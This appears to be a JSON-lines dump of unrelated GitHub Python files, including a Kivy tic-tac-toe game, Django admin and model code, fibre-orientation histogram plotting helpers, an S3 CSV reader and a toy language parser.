{"seq_id":"3042308476","text":"def checkMathExpr(expr):\n\tcount = 0\n\n\tfor i in expr:\n\t\tif count < 0:\n\t\t\treturn False\n\n\t\tif i == '(':\n\t\t\tcount += 1\n\n\t\tif i == ')':\n\t\t\tcount -= 1\n\n\tif count == 0:\n\t\treturn True\n\telse:\n\t\treturn False\n\nmathExpr = '((((((abccccsdfsdffsd)('\n\nprint(checkMathExpr(list(mathExpr)))","repo_name":"smenon8/AlgoDataStruct","sub_path":"practice_problems/CheckMathExpr.py","file_name":"CheckMathExpr.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"29007727233","text":"from kivy.app import App\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.button import Button\nfrom kivy.lang import Builder\nfrom kivy.core.window import Window\nfrom functools import partial\nimport sys\n\nBuilder.load_file('TicTacToe_v2.kv')\nWindow.size = (600, 600)\n\nclass Variables:\n\n    def __init__(self, score_player_x=0, score_player_o=0, player_turn='X', player_x_won=False, player_o_won=False, victory_button=None):\n        if victory_button is None:\n            victory_button = []\n        self.score_player_x = score_player_x\n        self.score_player_o = score_player_o\n        self.player_turn = player_turn\n        self.player_x_won = player_x_won\n        self.player_o_won = player_o_won\n        self.victory_button = victory_button\n\nvariables = Variables()\n\nclass GameOverPopup(Popup):\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n        if variables.player_x_won:\n            self.ids.popup_declare_winner.text = 'Player X won.'\n        elif variables.player_o_won:\n
self.ids.popup_declare_winner.text = 'Player O won.'\n\nclass MyLayout(Widget):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n for i in range(1, 101):\n board_button = BoardButton()\n self.ids[f'button_{i}'] = board_button\n self.ids.playboard.add_widget(board_button)\n board_button.bind(on_release=partial(self.play, f'button_{i}'))\n\n def reset_score(self):\n self.reset()\n self.ids.player_x_score.text = '0'\n self.ids.player_o_score.text = '0'\n\n def reset(self):\n for i in range(1, 101):\n self.ids[f'button_{i}'].text = ''\n self.ids[f'button_{i}'].background_color = (179/255, 179/255, 1, 1)\n variables.player_x_won = False\n variables.player_o_won = False\n variables.player_turn = 'X'\n\n def play(self, number, state):\n print(f'Button {number} pressed.')\n\n if self.ids[number].text == '':\n self.ids[number].text = variables.player_turn\n self.check_winner_x(variables.player_turn)\n else:\n return\n if variables.player_turn == 'X':\n self.ids[number].color = (0, 0, 1, 1)\n variables.player_turn = 'O'\n elif variables.player_turn == 'O':\n self.ids[number].color = (1, 0, 0, 1)\n variables.player_turn = 'X'\n\n def declare_winner(self, winner):\n\n if winner == 'X':\n variables.score_player_x += 1\n self.ids.player_x_score.text = f'{variables.score_player_x}'\n elif winner == 'O':\n variables.score_player_o += 1\n self.ids.player_o_score.text = f'{variables.score_player_o}'\n open_popup = GameOverPopup()\n open_popup.open()\n # self.reset()\n\n def check_winner_x(self, symbol):\n self.check_row(symbol)\n self.check_column(symbol)\n self.check_down(symbol)\n self.check_up(symbol)\n\n def check_row(self, symbol):\n for n in range(0, 10):\n x = 10*n\n iterator = 0\n for i in range(1, 11):\n if self.ids[f'button_{i+x}'].text == symbol:\n iterator += 1\n variables.victory_button.append(f'button_{i+x}')\n else:\n iterator = 0\n variables.victory_button.clear()\n if iterator == 5:\n if symbol == 'X':\n variables.player_x_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n elif symbol == 'O':\n variables.player_o_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n\n def check_column(self, symbol):\n\n for i in range(1, 11):\n iterator = 0\n for n in range(0, 10):\n x = 10*n\n if self.ids[f'button_{x+i}'].text == symbol:\n iterator += 1\n variables.victory_button.append(f'button_{x+i}')\n else:\n iterator = 0\n variables.victory_button.clear()\n if iterator == 5:\n if symbol == 'X':\n variables.player_x_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n elif symbol == 'O':\n variables.player_o_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n\n def check_down(self, symbol):\n\n for n in range(0, 11):\n if n in [0, 1, 2, 3, 4, 5]:\n x = 10*n\n else:\n x = n - 5\n iterator = 0\n for i in range(0, 10):\n try:\n # print(x+1+(11*i))\n if self.ids[f'button_{x+1+(11*i)}'].text == symbol:\n iterator += 1\n variables.victory_button.append(f'button_{x+1+(11*i)}')\n else:\n iterator = 0\n variables.victory_button.clear()\n except KeyError:\n pass\n if iterator == 5:\n if symbol == 'X':\n variables.player_x_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n elif symbol == 'O':\n variables.player_o_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n\n def check_up(self, symbol):\n\n for n in range(1, 7):\n iterator = 0\n for i in range(0, 10):\n try:\n if self.ids[f'button_{(10*n)+(i*9)}'].text == symbol:\n iterator += 1\n 
variables.victory_button.append(f'button_{(10*n)+(i*9)}')\n else:\n iterator = 0\n variables.victory_button.clear()\n except KeyError:\n pass\n if iterator == 5:\n if symbol == 'X':\n variables.player_x_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n elif symbol == 'O':\n variables.player_o_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n iterator_2 = 0\n for n in range(1, 6):\n iterator = 0\n for i in range(0, (9-iterator_2)):\n try:\n if self.ids[f'button_{(10-n)+(i*9)}'].text == symbol:\n iterator += 1\n variables.victory_button.append(f'button_{(10-n)+(i*9)}')\n else:\n iterator = 0\n variables.victory_button.clear()\n except KeyError:\n pass\n if iterator == 5:\n if symbol == 'X':\n variables.player_x_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n elif symbol == 'O':\n variables.player_o_won = True\n self.highlight_win()\n self.declare_winner(symbol)\n break\n iterator_2 += 1\n\n def highlight_win(self):\n for j, button in enumerate(variables.victory_button):\n self.ids[button].background_color = (1, 71 / 255, 26 / 255, 1)\n\n @staticmethod\n def exit_program():\n sys.exit()\n\nclass BoardButton(Button):\n pass\n\nclass TicTacToeApp(App):\n mainlayout = MyLayout()\n\n def build(self):\n Window.clearcolor = (1, 1, 1, 1)\n return self.mainlayout\n\nif __name__ == '__main__':\n TicTacToeApp().run()\n\n","repo_name":"f22daniel/TicTacToe_Kivy","sub_path":"TicTacToe_v2.py","file_name":"TicTacToe_v2.py","file_ext":"py","file_size_in_byte":8398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39034253081","text":"# sudo pip3 install igraph\n\nimport igraph\nimport sys\nfrom PIL import Image\n\ngraph_dir = sys.argv[1]\n\nfile_path = graph_dir + '/gml.txt'\nlabel_file = graph_dir + '/labels.txt'\nimage_path = graph_dir + '/graph_image.png'\n\ndef getValue(value):\n colorList = ['blue','green','purple','yellow','red','pink','orange','black','white','gray','brown','wheat', \n 'coral', 'alice blue', 'cyan', 'green yellow', 'light blue', 'hot pink', 'light green', 'gold']\n\n return colorList[int(value)]\n\ndef drawIGraph(file_path, image_path):\n g = igraph.Graph.Read_GML(file_path)\n g.vs['label'] = ['']\n\n igraph.plot(g, image_path)\n\ndef drawIGraphWithLabel(file_path, image_path, label_list):\n g = igraph.Graph.Read_GML(file_path)\n g.vs['label'] = ['']\n\n visual_style = dict()\n visual_style['vertex_color'] = list(map(getValue, label_list))\n\n igraph.plot(g, image_path, **visual_style)\n # image = igraph.plot(g, **visual_style)\n # image.save(image_path)\n\ndef drawIGraphWithLabelFile(file_path, image_path, label_file):\n f = open(label_file)\n s = f.read()\n label_list = s.split()\n # print(label_list)\n \n drawIGraphWithLabel(file_path, image_path, label_list)\n\ndrawIGraphWithLabelFile(file_path, image_path, label_file)","repo_name":"AIBluefisher/DAGSfM","sub_path":"scripts/python/read_igraph.py","file_name":"read_igraph.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":368,"dataset":"github-code","pt":"75"} +{"seq_id":"23638594760","text":"from django.contrib import admin\nfrom .models import Profile, User\n\n#Include Profile form in user form. 
Add and change User in conjunction with Profile.\n'''Because signals are used, when a user is created a profile is created simultaneously.\nIf the Profile form is not included in the User form, an error is generated by the unique fields in Profile.\nIf Profile didn't have unique fields, it might not need to be added as an inline.\n'''\nclass ProfileAdminInline(admin.StackedInline):\n model = Profile #Model reference\n can_delete = False\n verbose_name_plural = 'Profile'\n fk_name = 'email' #Model foreign key\n\n list_display = ('name', 'last_name', 'dni_number', 'updated')\n list_filter = ('name', 'last_name', 'dni_number') #Fields to order information in shown list\n \n #Fields in admin to edit-add\n fieldsets = (\n (None,{\n 'fields' : (('name', 'last_name'), 'avatar', 'updated')\n }),\n\n ('Personal Information',{\n 'classes' : ('wide',),\n 'fields' : (('dni_number', 'dni_type'), 'birth_date', 'gender')\n\n }),\n\n ('Location',{\n 'classes' : ('wide',),\n 'fields' : ('country', 'province', 'city')\n }),\n )\n\nclass UserAdmin(admin.ModelAdmin):\n #Include Profile form in User form\n inlines = [\n ProfileAdminInline,\n ]\n\n list_display = ('email', 'is_active')\n fieldsets = (\n (None, {\n 'fields' : ('email', 'password', ('groups', 'user_permissions'),'is_superuser', 'is_active', 'is_staff', 'is_admin')\n }),\n )\n\nadmin.site.register(User, UserAdmin)","repo_name":"nicoduquelsky/etitango","sub_path":"etitango/apps/profiles/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"15426546624","text":"from hparams import Hparams\nimport time\nimport os\nimport wandb\nimport torch\nimport torchvision\nfrom random import randrange\n\n\ndef initiate_run(hparams: Hparams):\n    \"\"\"\n    Initialize connection to wandb and begin the run using provided hparams\n    \"\"\"\n    with open(hparams.keyring_dir + \"wandb.key\") as key:\n        wandb.login(key=key.read().strip())\n        key.close()\n\n    if hparams.use_wandb:\n        mode = \"online\"\n    else:\n        mode = \"disabled\"\n\n    run = wandb.init(\n        name=f\"{hparams.architecture}_{int(time.time())}\",\n        project=hparams.project,\n        config=hparams.wandb_export(),\n        mode=mode,\n    )\n\n    return run\n\n\ndef load_model(hparams, model, optimizer, scheduler=None):\n\n    model_pth = os.path.join(\n        hparams.model_dir, f\"{hparams.architecture}/checkpoint.pth\"\n    )\n\n    params = torch.load(model_pth)\n    model.load_state_dict(params[\"model_state_dict\"])\n    optimizer.load_state_dict(params[\"optimizer_state_dict\"])\n    if scheduler is not None:\n        scheduler.load_state_dict(params[\"scheduler_state_dict\"])\n        return model, optimizer, scheduler\n\n    return model, optimizer\n\n\ndef prepare_instance() -> None:\n    raise NotImplementedError\n\n\ndef test_transforms(hparams, num: int = 5, start: int = -1) -> None:\n    TRAIN_DIR = os.path.join(hparams.data_dir, \"classification/train\")\n    transform_stack = list(hparams.transform_stack)\n    train_transforms = torchvision.transforms.Compose(transform_stack)\n    train_dataset = torchvision.datasets.ImageFolder(\n        TRAIN_DIR, transform=train_transforms\n    )\n\n    if start == -1:\n        offset = randrange(start=0, stop=len(train_dataset) - num)\n    else:\n        offset = start\n\n    for i in range(offset, offset + num):\n
display(train_dataset[i][0])\n","repo_name":"josephbajor/CMU_11-785_face_identification","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13286043835","text":"from django.db import models\n\nfrom datetime import datetime\n\nclass Task(models.Model):\n user_id = models.IntegerField(null=True)\n name = models.CharField(max_length=200)\n deadline = models.DateTimeField('deadline')\n description = models.TextField(default=None, blank=True, null=True)\n\n def str_type(self):\n delta_time = (self.deadline.replace(tzinfo=None) - datetime.now()).total_seconds()\n \n deta_time_str = ''\n\n seconds = int(delta_time % 60)\n delta_time /= 60\n\n minutes = int(delta_time % 60)\n delta_time /= 60\n\n hours = int(delta_time % 24)\n delta_time /= 24\n\n days = int(delta_time)\n\n big_delay = False\n if days!=0:\n deta_time_str += f\"{days} days \"\n big_delay = True\n\n if hours!=0:\n deta_time_str += f\"{hours} hours \"\n big_delay = True\n \n if not big_delay:\n if minutes!=0:\n deta_time_str += f\"{minutes} minutes \"\n \n if seconds!=0:\n deta_time_str += f\"{seconds} seconds \"\n \n if days<=1:\n label_type = 'danger'\n elif days>=2:\n label_type = 'warning'\n else: \n label_type = 'success'\n\n return deta_time_str, label_type","repo_name":"matrix1220/django_task","sub_path":"task/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9571500694","text":"# All functions used in the jupyter notebook, to avoid cluttering the notebook.\n\nimport os, sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef plot_hist(data,slice_selection, use_weighted, normalize_by_maxval=False,save_dir=None, color_map=None, ylim=None): \n \"\"\"Plots orientation distribution in different flavors.\n data: numpy array with (rows,cols)=(slices,histogram count (180bins)) (obtained from fiji script + processed in notebook)\n slice_selection: None or a list of indices, e.g. [1] or [2,5]. one-based\n use_weighted. boolean. Whether a coherency-weighted histogram is used. Must match the data! Here used for correct\n axis labeling.\n normalize_by_maxval: boolean. whether to normalize the distribution of each slice individually by its max, such \n that the max value (most frequent hist count) is =1. \n save_dir: if not None: saves plots into this directory. 
Folder must exist on disk.\n color_map: None (uses \"copper\") or any of these strings: https://matplotlib.org/tutorials/colors/colormaps.html\n ylim: if not None: sets the ylim\n \"\"\"\n \n # prepare save name for figure\n figname=\"OrientationHistogram\"\n descr1=\"_AllSlices\" if (slice_selection is None) else \"_SelectedSlices\"\n descr2=\"_CoherencyWeightedCount\" if (use_weighted) else \"_UnweightedCount\"\n descr3=\"_NormalizedToMax1\" if (normalize_by_maxval) else \"\"\n figname=figname+descr1+descr2+descr3+\".png\"\n \n # prepare figure description\n if use_weighted:\n if normalize_by_maxval:\n ylabel=\"frequency (weighted, normalized by max)\"\n title=\"Orientation distribution (weighted with coherencies, per slice normalized by max)\"\n else:\n ylabel=\"frequency (weighted)\"\n title=\"Orientation distribution (weighted with coherencies)\"\n else:\n if normalize_by_maxval:\n ylabel=\"frequency (normalized by max)\"\n title=\"Orientation distribution (unweighted, per slice normalized by max)\"\n else:\n ylabel=\"frequency\"\n title=\"Orientation distribution (unweighted)\"\n \n # init plot\n angles=np.linspace(-89.5,89.5,180) # center of bins\n plt.figure(figsize=(12,7))\n ax = plt.subplot(111)\n \n # use all slices if not specified\n if slice_selection is None:\n slice_selection=np.arange(1,1+data.shape[0])\n \n # prepare array with colors\n if color_map is None:\n color_map=\"copper\"\n colors=np.squeeze(plt.get_cmap(color_map)([np.linspace(0,1,len(slice_selection))]))\n \n # if only one slice plotted, need to make colors array 2d\n if colors.ndim==1:\n colors=np.expand_dims(colors,axis=0)\n \n # actual plotting\n for idx in range(len(slice_selection)):\n s=slice_selection[idx]\n y=data[s-1,:] # slices are one-based\n\n if normalize_by_maxval:\n maxval=np.max(y)\n y=y/maxval\n\n plt.plot(angles,y,color=colors[idx],label=\"slice \"+str(s)) \n \n plt.xlim([-90,90])\n plt.xlabel(\"orientation (in degree)\",size=14)\n plt.ylabel(ylabel,size=14)\n plt.title(title,size=14)\n\n # Shrink current axis by 20%\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n # Put a legend to the right of the current axis\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n \n # y-axis adjustement\n if ylim is not None:\n plt.ylim(ylim)\n \n # save the figure\n if save_dir is not None:\n plt.savefig(os.path.join(save_dir,figname))\n\n plt.show()\n \n \n \ndef plot_coherency(data,use_weighted, save_dir=None): \n if not use_weighted:\n print(\"Cannot calculate average coherency with unweighted histogram. Rerun the notebook with 'use_weighted=True'\")\n return\n \n # unweighted histogram sums to =1. 
therefore the weighted sums to mean(coherency)\n avg_coherencies=np.sum(data,1) \n xax=np.arange(1,len(avg_coherencies)+1)\n\n plt.figure(figsize=(9,5))\n plt.plot(avg_coherencies,\".-\")\n plt.ylim([0,1])\n plt.xlabel(\"slice id\",size=16)\n plt.ylabel(\"average coherency\",size=16)\n plt.title(\"average coherency (measure for orientation confidence) per slice\",size=16)\n plt.xticks(xax)\n \n # save the figure\n if save_dir is not None:\n fn=os.path.join(save_dir,\"Average_Coherency_per_Slice.png\")\n plt.savefig(fn)\n \n plt.show()\n\n \n \ndef get_filename_csv_histdata(data_folder, use_weighted):\n \"\"\"Returns the full path filename of the csv file which contains the histogram data, takes thereby care of \n whether the weighted/unweighted data is being used.\n Basenames of the csv files are hardcoded.\n \"\"\"\n fn_weightedhist=\"orientationDistribution_CoherencyWeighted.csv\"\n fn_unweightedhist=\"orientationDistribution_Unweighted.csv\"\n\n if use_weighted:\n fn_load=os.path.join(data_folder,fn_weightedhist)\n else:\n fn_load=os.path.join(data_folder,fn_unweightedhist)\n\n if not os.path.isfile(fn_load):\n print(\"ERROR: Cannot find the csv file with histogram data: \\n\",fn_load)\n else:\n print(\"Found csv file with histogram data:\",fn_load)\n\n return fn_load\n \n \ndef quick_plot_of_peak_selection(datasets,use_weighted,sliceids_longitudinal, sliceids_circular, titles, save_dir=None, ylim=None): \n \"\"\" Quick visualization to check whether the selected circular/longitudinal slices (peaks) are correct.\n Comparable to plot_hist but less fancy (however more convenient colormap for this purpose). \n Does allow for plotting multiple datasets at once.\n data: list[arrays], or a single numpy array with (rows,cols)=(slices,histogram count (180bins)) (obtained from fiji script + processed in notebook)\n use_weighted: for axis labeling\n sliceids_longitudinal: list[ints] or single int of the slice id with the longitudinal fiber orientation peak\n sliceids_circular: see above\n titles: list[strings] or string with typically the dataset name. \n save_dir: if not None: saves plots into this directory. 
Folder must exist on disk.\n ylim: if not None: sets the ylim\n \"\"\"\n \n # save name for figure\n figname=\"OverviewPeakSelection.png\"\n \n # prepare figure description\n if use_weighted:\n ylabel=\"frequency (weighted)\"\n else:\n ylabel=\"frequency\"\n \n # convert single dataset also to list\n if not isinstance(datasets,list):\n datasets=[datasets]\n sliceids_longitudinal=[sliceids_longitudinal]\n sliceids_circular=[sliceids_circular]\n titles=[titles]\n \n assert len(datasets) == len(sliceids_longitudinal) == len(sliceids_circular) == len(titles)\n \n # bin centers\n angles=np.linspace(-89.5,89.5,180) \n \n # subplots layout\n ncols=1 if len(datasets)==1 else 2\n nrows=int(1+len(datasets)/ncols)\n \n plt.figure(figsize=(6*ncols,4*nrows))\n plt.subplots_adjust(hspace=0.4) # default=0.2\n \n # one subplot per dataset\n for data_id in range(len(datasets)):\n plt.subplot(nrows,ncols,data_id+1)\n \n data=datasets[data_id]\n slice_long=sliceids_longitudinal[data_id]\n slice_circ=sliceids_circular[data_id]\n title=titles[data_id]\n \n for idx in range(data.shape[0]):\n plt.plot(angles,data[idx,:],color=[0.7,0.7,0.7])\n \n plt.plot(angles,data[slice_long-1,:],color=[0.9,0,0]) #red\n plt.plot(angles,data[slice_circ-1,:],\"blue\") \n \n plt.xlim([-90,90])\n plt.xlabel(\"orientation (in degree)\",size=12)\n plt.ylabel(ylabel,size=12)\n plt.title(title+\" (slices: \"+str(slice_circ)+\", \"+str(slice_long)+\")\",size=14)\n\n # y-axis adjustement\n if ylim is not None:\n plt.ylim(ylim)\n\n\n # save the figure\n if save_dir is not None:\n plt.savefig(os.path.join(save_dir,figname))\n\n plt.show()\n \n \n\n \ndef _sliceid_of_highest_peak_within_tolerance(maxvals, dist, tolerance):\n \"\"\"returns the id of the slice with the highest peak value (maxvals), for which the peak location distance (dist)\n to the expected max location is less than peak tolerance (in deg)\n slice_id is one based!.\n \"\"\"\n sub_sliceidxs=np.where(dist<tolerance)[0]\n if len(sub_sliceidxs)==0:\n return None\n # among the slices within tolerance: pick the one with the highest peak (slice ids are one-based)\n slice_id=sub_sliceidxs[np.argmax(maxvals[sub_sliceidxs])]+1\n return slice_id\n\n\ndef _sliceids_of_longitudinal_and_circular_hist_peak(data, peak_circular_expected, peak_longitudinal_expected, peak_tolerance=20):\n \"\"\"Finds the slice ids (one-based) whose histogram peak lies closest to the expected circular,\n resp. longitudinal orientation (peak must be within peak_tolerance, in degree).\n \"\"\"\n # peak height and peak location (bin center, in degree) of each slice\n max_values=np.max(data,1)\n max_loc_degrees=np.argmax(data,1)-89.5\n\n def compute_angle_dist(angles, expected_angle):\n dist=abs(angles-expected_angle)\n # orientations are cyclic with period 180: distance cannot be >90 or <-90\n dist[dist>90]=abs(180-dist[dist>90])\n return dist # in degree\n \n dist_longitudinal=compute_angle_dist(max_loc_degrees,peak_longitudinal_expected) \n dist_circular=compute_angle_dist(max_loc_degrees,peak_circular_expected)\n\n # slice ids of circular/longitudinal peaks\n circ_id=_sliceid_of_highest_peak_within_tolerance(max_values,dist_circular,peak_tolerance)\n long_id=_sliceid_of_highest_peak_within_tolerance(max_values,dist_longitudinal,peak_tolerance) \n \n return circ_id, long_id\n\n\n\ndef load_datasets_and_find_peaks(list_of_folders,use_weighted, peak_circular_expected, peak_longitudinal_expected):\n \"\"\"Processes all folders in list_of_folders: loads for each folder the histogram csv file, then finds the \n slice-ids (one-based) with the highest peak (for circular and longitudinal fibers separately).\n Params:\n use_weighted: should always be true\n peak_circular_expected, peak_longitudinal_expected: see _sliceids_of_longitudinal_and_circular_hist_peak\n Returns:\n data_list: list of numpy arrays of size (nslices, 180), one entry per folder of list_of_folders\n id_list_circular: list of slice id's (one based) for which the histogram of the circular fibers was highest.\n One id per dataset.\n id_list_longitudinal: see above \n \"\"\"\n\n data_list=[]\n id_list_circular=[]\n id_list_longitudinal=[]\n \n for datadir in list_of_folders:\n # load data and convert to numpy array\n fn_load=get_filename_csv_histdata(datadir,use_weighted)\n df=pd.read_csv(fn_load)\n data=(df.iloc[:,1:]).values # first/second,.. 
row: slice 1,2,..\n\n # find slices with highest peaks\n circ_id, long_id = _sliceids_of_longitudinal_and_circular_hist_peak(data,peak_circular_expected,peak_longitudinal_expected)\n \n data_list.append(data)\n id_list_circular.append(circ_id)\n id_list_longitudinal.append(long_id)\n \n return data_list,id_list_circular,id_list_longitudinal\n\n\ndef get_statistics(datasets, sliceids_long, sliceids_circ):\n \"\"\"Computes the mean and stddev between the orientation distributions of the different experiemnts.\n For each experiemnt the longitudinal and circular distribution with the highest peak is chosen \n params: see output of load_datasets_and_find_peaks()\n returns:\n ymean_circ, ystddev_circ, ymean_long, ystddev_long: the mean and stddev of the distributions, array of shape (180,)\n \"\"\"\n # collect circular, resp. longitudinal max-peak curves \n y_circ=collect_peak_distributions(datasets,sliceids_circ)\n y_long=collect_peak_distributions(datasets,sliceids_long)\n\n # get statistics\n ymean_circ=np.mean(y_circ,0)\n ystddev_circ=np.std(y_circ,0)\n ymean_long=np.mean(y_long,0)\n ystddev_long=np.std(y_long,0) \n \n return ymean_circ, ystddev_circ, ymean_long, ystddev_long\n\n \ndef collect_peak_distributions(datasets, sliceids):\n \"\"\"collect curves with highest peak. (sliceid: one-based). returns array (nsamples,180)\"\"\"\n y=np.zeros((len(datasets),datasets[0].shape[-1]))\n for i in range(y.shape[0]):\n y[i]=datasets[i][sliceids[i]-1,:] # one-based\n return y\n\n\ndef plot_average_histogram(ym_circ,ystd_circ,ym_long,ystd_long, numsamples=None, save_dir=None,ylim=None): \n \"\"\" Plots the average +- stddev orientaiton distribution of the orientation histogram (for longitudinal and circular).\n Purpose: plot result of get_statistics().\n Params:\n ym_circ, ystd_circ: mean and stddev of circular fiber distribution\n ym_long, ystd_long: ... longitudinal ...\n [removed: use_weighted]\n numsamples: optional: provide the number of datasets that was used (int) -> added to title\n save_dir: if not None: saves plots into this directory. 
Folder must exist on disk.\n ylim: if not None: sets the ylim\n \"\"\"\n \n figname=\"AveragedOrientationHistogram.png\"\n ylabel=\"frequency (mean+-stddev)\"\n title=\"Average orientation distribution\"\n if numsamples is not None:\n title+=\" (n=\"+str(numsamples)+\")\"\n \n # bin centers\n angles=np.linspace(-89.5,89.5,180) \n \n plt.figure(figsize=(7,5))\n ax = plt.subplot(111)\n \n # plotting\n plt.plot(angles,ym_circ, 'b-',label=\"circular\")\n plt.fill_between(angles,ym_circ-ystd_circ,ym_circ+ystd_circ,color=[0.8,0.8,0.8]) # light gray\n\n plt.plot(angles,ym_long, '-',color=[.9,0,0],label=\"longitudinal\") # red\n plt.fill_between(angles,ym_long-ystd_long,ym_long+ystd_long,color=[0.8,0.8,0.8]) \n\n plt.xlim([-90,90])\n plt.xlabel(\"orientation (in degree)\",size=14)\n plt.ylabel(ylabel,size=14)\n plt.title(title,size=14)\n \n ax.legend()\n\n # y-axis adjustement\n if ylim is not None:\n plt.ylim(ylim)\n\n # save the figure\n if save_dir is not None:\n plt.savefig(os.path.join(save_dir,figname))\n\n plt.show()","repo_name":"walkernoreen/muscle_fiber_orientation","sub_path":"helpers_histogram_analysis.py","file_name":"helpers_histogram_analysis.py","file_ext":"py","file_size_in_byte":14907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"7025461570","text":"\nimport boto3\nimport pandas as pd\n\nAWS_ACCESS_KEY_ID = ''\nAWS_SECRET_ACCESS_KEY = ''\n\nAWS_REGION = 'us-east-1'\nAWS_STORAGE_BUCKET_NAME = 'pysparkwrite'\nFILE_NAME = 'part-00000-a4e2f798-ccce-4acd-9ad0-27197ac7b69a-c000.csv'\n\ns3 = boto3.client('s3', aws_access_key_id=AWS_ACCESS_KEY_ID, aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n\nobj = s3.get_object(Bucket=AWS_STORAGE_BUCKET_NAME, Key=FILE_NAME)\ndf = pd.read_csv(obj['Body'])\nprint(df)","repo_name":"Spidyweb-3588/python_skillup","sub_path":"local_to_s3a/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"530539966","text":"from lex import lex\n\nconstants = [\"str\", \"int\", \"bool\"]\nvalidargs = [\"str\", \"int\", \"bool\", \"var\", \"staticvar\"]\n\ndef parse(filename):\n    lexed = lex(filename)\n\n    ast = []\n\n    for line in lexed:\n        ast.append(parseline(line))\n\n    return ast\n\ndef parseline(line):\n    if line[0] in constants:\n        return line\n    elif line[0] == \"args\":\n        if len(line[1]) >= 1:\n            buffer = []\n            altbuffer = []\n            line[1].append([\"argseperate\"])\n            funcscope = 0\n            for arg in line[1]:\n                if arg[0] == \"function\":\n                    altbuffer.append(arg)\n                    funcscope += 1\n                elif arg[0] == \"argend\":\n                    altbuffer.append(arg)\n                    funcscope -= 1\n                elif funcscope == 0 and arg[0] == \"argseperate\":\n                    if len(altbuffer) > 1:\n                        buffer.append(altbuffer)\n                    else:\n                        buffer.append(altbuffer[0])\n                    altbuffer = []\n                else:\n                    altbuffer.append(arg)\n            for arg in buffer:\n                if arg[0] in validargs:\n                    altbuffer.append(arg)\n                else:\n                    altbuffer.append(parseline(arg))\n            return altbuffer\n        return []\n    elif line[0][0] in constants:\n        return parseline(line[0])\n    elif line[0][0] == \"functiondefine\":\n        argend = len(line) - 2\n        args = []\n        for i in range(3, argend):\n            args.append(line[i][1])\n        return [\"newfunc\", line[1][1], line[2][1], args]\n    elif line[0][0] == \"functionterminate\":\n        return [\"endfunc\"]\n    elif line[0][0] == \"setvar\":\n        if line[4][0] == \"function\":\n            return [line[0][0], line[1][1], line[2][1], parseline(line[4:])]\n        return [line[0][0], line[1][1], line[2][1], parseline(line[4])]\n    elif line[0][0] == \"setstaticvar\":\n        if line[4][0] == \"function\":\n            raise Exception(\"error: staticvar cannot be set as returned value from function\")\n        return [line[0][0], line[1][1], line[2][1], parseline(line[4])]\n    elif line[0][0] == \"function\":\n        if line[1][0] == \"argend\":\n            return [\"call\", line[0][1], []]\n        else:\n            return [\"call\", line[0][1], parseline([\"args\", line[1:-1]])]\n    elif line[0][0] == \"assert\":\n        return [line[0][0], line[1]]\n    elif line[0][0] == \"ifdefine\":\n        return [line[0][0], [parseline(line[2:-2])]]\n    elif line[0][0] == \"whiledefine\":\n        return [line[0][0], [parseline(line[2:-2])]]\n    raise Exception(\"token unknown\")\n\nif __name__ == \"__main__\":\n    print(parse(\"../tests/printstr.psn\"))\n","repo_name":"urlordjames/pointysnake","sub_path":"src/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"42777500913","text":"\n# -*- coding: utf-8 -*-\n\nimport json\nimport os\nfrom tkinter import *\nimport color_helper\n\n\n# Color formula for painted tiles, taken from Terraria's source and adjusted for Python\n# base_color (list of tile + wall colors), paint_color (list of paint colors), wall (whether a wall is being painted)\ndef painted_color(base_color, paint_color, wall):\n red = base_color[0] / 255\n green = base_color[1] / 255\n blue = base_color[2] / 255\n\n if green > red:\n red = green\n if blue > red:\n num = red\n red = blue\n blue = num\n\n # Shadow\n if(paint_color[0] == 25 and paint_color[1] == 25 and paint_color[2] == 25):\n shadow = blue * 0.3\n painted_red = int(paint_color[0] * shadow)\n painted_green = int(paint_color[1]* shadow)\n painted_blue = int(paint_color[2] * shadow)\n # Negative\n elif (paint_color[0] == 200 and paint_color[1] == 200 and paint_color[2] == 200):\n if wall:\n painted_red = int((255 - base_color[0]) * 0.5)\n painted_green = int((255 - base_color[1]) * 0.5)\n painted_blue = int((255 - base_color[2]) * 0.5)\n else:\n painted_red = int(255 - base_color[0])\n painted_green = int(255 - base_color[1])\n painted_blue = int(255 - base_color[2])\n else:\n new_brightness = red\n painted_red = int(paint_color[0] * new_brightness)\n painted_green = int(paint_color[1] * new_brightness)\n painted_blue = int(paint_color[2] * new_brightness)\n\n return 